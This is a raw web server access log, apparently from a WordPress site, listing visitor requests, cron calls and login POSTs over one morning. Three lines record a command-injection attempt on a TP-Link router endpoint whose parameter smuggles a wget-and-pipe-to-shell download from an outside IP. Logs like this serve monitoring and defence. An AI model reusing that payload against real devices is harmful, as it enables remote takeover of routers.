104.239.73.68 - - [06/Sep/2025:06:07:01 +0800] "GET / HTTP/1.1" 200 33467 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1"
104.239.73.68 - - [06/Sep/2025:06:07:03 +0800] "GET /wp-json/ HTTP/1.1" 200 19172 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [06/Sep/2025:06:08:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757110092.0692939758300781250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.62.213.187 - - [06/Sep/2025:06:08:12 +0800] "GET /policy/ HTTP/1.1" 200 18715 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.133.241 - - [06/Sep/2025:06:11:37 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px-300x169.webp HTTP/1.1" 200 15072 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2.44.137.95 - - [06/Sep/2025:06:13:49 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [06/Sep/2025:06:13:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757110429.9118969440460205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [06/Sep/2025:06:16:20 +0800] "POST /wp-cron.php?doing_wp_cron=1757110580.7493419647216796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:06:16:20 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
177.157.98.89 - - [06/Sep/2025:06:16:38 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
177.157.98.89 - - [06/Sep/2025:06:16:38 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [06/Sep/2025:06:20:27 +0800] "POST /wp-cron.php?doing_wp_cron=1757110827.0195260047912597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [06/Sep/2025:06:20:46 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [06/Sep/2025:06:23:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757111033.6128160953521728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:06:23:53 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:06:38:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757111883.5919139385223388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
57.130.20.252 - - [06/Sep/2025:06:38:03 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
57.130.20.252 - - [06/Sep/2025:06:38:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
